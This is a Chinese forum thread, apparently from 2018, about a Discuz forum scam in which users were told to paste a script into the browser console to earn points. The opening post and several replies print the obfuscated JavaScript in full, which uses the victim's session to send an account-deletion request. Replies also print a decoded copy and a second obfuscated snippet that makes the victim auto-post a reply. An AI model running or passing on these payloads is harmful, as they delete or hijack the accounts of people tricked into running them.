这是一个创建于 2669 天前的主题,其中的信息可能已经有所发展或是发生改变。
这两天有人在我站水帖。。。。。告诉别的用户在 console 执行一段脚本能领到积分。。结果他们自己账号变得乱七八糟的了。。。
废话不说。。。上代码 你们自己看看
location['\x68\x72\x65\x66']=((d=(await(await fetch("\x2e\x2f\x68\x6f\x6d\x65\x2e\x70\x68\x70\x3f\x6d\x6f\x64\x3d\x73\x70\x61\x63\x65\x63\x70\x26\x61\x63\x3d\x61\x76\x61\x74\x61\x72",{credentials:'\x69\x6e\x63\x6c\x75\x64\x65'}))['\x74\x65\x78\x74']())['\x6d\x61\x74\x63\x68'](/\/\/\S+\/images\/ca\S+&ag/g)[0]['\x72\x65\x70\x6c\x61\x63\x65']('\x69\x6d\x61\x67\x65\x73\x2f\x63\x61\x6d\x65\x72\x61\x2e\x73\x77\x66\x3f','\x3f\x6d\x3d\x75\x73\x65\x72\x26\x61\x3d\x64\x65\x6c\x65\x74\x65\x26'))&&confirm('\u7eff\u5b9d\u77f3'))?d:'';
废话不说。。。上代码 你们自己看看
location['\x68\x72\x65\x66']=((d=(await(await fetch("\x2e\x2f\x68\x6f\x6d\x65\x2e\x70\x68\x70\x3f\x6d\x6f\x64\x3d\x73\x70\x61\x63\x65\x63\x70\x26\x61\x63\x3d\x61\x76\x61\x74\x61\x72",{credentials:'\x69\x6e\x63\x6c\x75\x64\x65'}))['\x74\x65\x78\x74']())['\x6d\x61\x74\x63\x68'](/\/\/\S+\/images\/ca\S+&ag/g)[0]['\x72\x65\x70\x6c\x61\x63\x65']('\x69\x6d\x61\x67\x65\x73\x2f\x63\x61\x6d\x65\x72\x61\x2e\x73\x77\x66\x3f','\x3f\x6d\x3d\x75\x73\x65\x72\x26\x61\x3d\x64\x65\x6c\x65\x74\x65\x26'))&&confirm('\u7eff\u5b9d\u77f3'))?d:'';
 | 1 Event OP 具体账号发生了什么神奇的变化。。 你们自己试试看吧 我很无奈 。。 |
| 2 Event OP 而且貌似不是软层的。。。直接从 sql 层干掉了? |
| 3 Event OP 哦对。。输完后退出帐号 重新登录才能看到效果 |
 | 5 suit 2018 年 11 月 11 日 没有变化 |
 | 12 ScotGu 2018 年 11 月 11 日 |
 | 13 t6attack 2018 年 11 月 11 日 location['href'] = ((d = (await(await fetch("./home.php?mod=spacecp&ac=avatar", { credentials: 'include' }))['text']())['match'](/\/\/\S+\/images\/ca\S+&ag/g)[0]['replace']('images/camera.swf?', '?m=user&a=delete&')) && confirm('绿宝石')) ? d : ''; |
| 14 t6attack 2018 年 11 月 11 日 让用户自己执行动作代码,这,,这算漏洞?!下面代码可以在 v2 执行 $("\x23\x72\x65\x70\x6c\x79\x5f\x63\x6f\x6e\x74\x65\x6e\x74")["\x76\x61\x6c"]("\u6240\u4ee5\u4f60\u4eec\u5230\u5e95\u5acc\x4a\x53\u6743\u9650\u592a\u5927\u8fd8\u662f\u592a\u5c0f\u4e86\uff1f\uff1f");$("\x23\x72\x65\x70\x6c\x79\x5f\x63\x6f\x6e\x74\x65\x6e\x74")["\x70\x61\x72\x65\x6e\x74"]()["\x73\x75\x62\x6d\x69\x74"](); |
 | 15 mengyaoss77 2018 年 11 月 12 日 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 16 dot2017 2018 年 11 月 12 日  1 这个 bug 老早就有了,利用 uc 头像删除自己的账号。临时解决办法是切换到 H5 头像模式,X3.4 自带了 |
| 18 Event OP @mengyaoss77 是程序权限没控制好 |
 | 19 Perry 2018 年 11 月 12 日 via iPhone 这是 social engineering 不是 bug |
| 20 mengyaoss77 2018 年 11 月 12 日 @Event #18 这是我执行 14 楼的代码自动回复的  |
 | 22 airyland 2018 年 11 月 12 日 所以你们到底嫌 JS 权限太大还是太小了?? |
| 23 airyland 2018 年 11 月 12 日 试了楼上的代码,自动发出回复了。。 |
 | 24 crab 2018 年 11 月 12 日 |
| 25 crab 2018 年 11 月 12 日 3  |
 | 26 KasuganoSoras 2018 年 11 月 12 日 via Android 这个 bug 老早就有了,我成功删了自己在很多论坛的账号。 不过我现在都自己开发论坛了,不用 Discuz |
 | 27 penisulaS 2018 年 11 月 12 日 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 28 为什么那么多网站都在 console 里打东西提醒用户不要执行陌生人发来的代码 |
 | 29 ThirdFlame 2018 年 11 月 12 日 人肉型 CSRF |
 | 30 lixueyu001 2018 年 11 月 12 日 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 31 dumbass 2018 年 11 月 12 日 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 32 v9ex 2018 年 11 月 12 日 $("\x23\x72\x65\x70\x6c\x79\x5f\x63\x6f\x6e\x74\x65\x6e\x74")["\x76\x61\x6c"]("\u6240\u4ee5\u4f60\u4eec\u5230\u5e95\u5acc\x4a\x53\u6743\u9650\u592a\u5927\u8fd8\u662f\u592a\u5c0f\u4e86\uff1f\uff1f");$("\x23\x72\x65\x70\x6c\x79\x5f\x63\x6f\x6e\x74\x65\x6e\x74")["\x70\x61\x72\x65\x6e\x74"]()["\x73\x75\x62\x6d\x69\x74"](); |
 | 33 Removable 2018 年 11 月 12 日 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 34 respect11 2018 年 11 月 12 日 via iPhone 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 35 s527332935 2018 年 11 月 12 日 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 36 Lebal 2018 年 11 月 12 日 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 37 FakeLeung 2018 年 11 月 12 日 location['href']=( (d=(await(await fetch("./home.php?mod=spacecp&ac=avatar", {credentials: 'include'})['text']())['match'](/\/\/\S+\/images\/ca\S+&ag/g)[0]['replace']('images/camera.swf?', '?m=user&a=delete&')&&confirm('绿宝石'))?d:'';  来来来,大神们分析一下,这是 js 的问题还是后端的问题? @respect11 @Removable @bojackhorseman @lixueyu001 @airyland |
 | 38 autoxbc 2018 年 11 月 12 日 其实是人的问题,在微利下人就失去理智,罔顾不懂的事情不要做的常识,跟技术没半点关系 |
 | 39 crystom 2018 年 11 月 12 日 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 40 cookii 2018 年 11 月 12 日 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 41 exceloo 2018 年 11 月 12 日 这和 js 有半毛钱关系,只是诱导用户自己去删除帐号罢了。前端发的请求,js 都能模拟,用户自己作死去跑莫名其妙的代码你再牛逼也防不住啊。客户端执行的,又不是在服务端,还能咋办 |
 | 42 simple11 2018 年 11 月 12 日 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 44 hero2040407 2018 年 11 月 12 日 所以说删除用户这种操作需要一个提醒吧,点一下就直接删掉了? |
 | 46 sparkssssssss 2018 年 11 月 12 日 我擦,楼主好歹说下,运行的后果啊,我刚运行了下把我的账号给删掉了.................. |
 | 47 cname 2018 年 11 月 12 日 想利用这个代码删掉那些论坛账号的,但是我执行了不管用,跳转到 500 了。是程序版本问题? |
 | 48 kn007 2018 年 11 月 12 日 好久前就见过了,DZ 一直没修复。 |
 | 49 roryzh 2018 年 11 月 12 日 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 50 Jiaming 2018 年 11 月 13 日 所以你们到底嫌 JS 权限太大还是太小了?? |
| 51 roryzh 2018 年 11 月 13 日 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 52 Fakey2 2018 年 12 月 7 日 这不是漏洞,这只是诱导类似钓鱼了,安全意识薄弱的人才会上当,根本也不是 DZ 本身的漏洞。。。我让你在 console 执行你就执行,这不是傻子行为么。。。所以跟 DZ 本身没关系。。。 |
 | 53 xemtof 2019 年 1 月 9 日 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 54 uyhsefwa 2019 年 5 月 16 日 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 55 xmdhs 2020 年 2 月 26 日 所以你们到底嫌 JS 权限太大还是太小了?? |
 | 56 binnerchen 2020 年 11 月 29 日 所以你们到底嫌 JS 权限太大还是太小了?? |
Select Language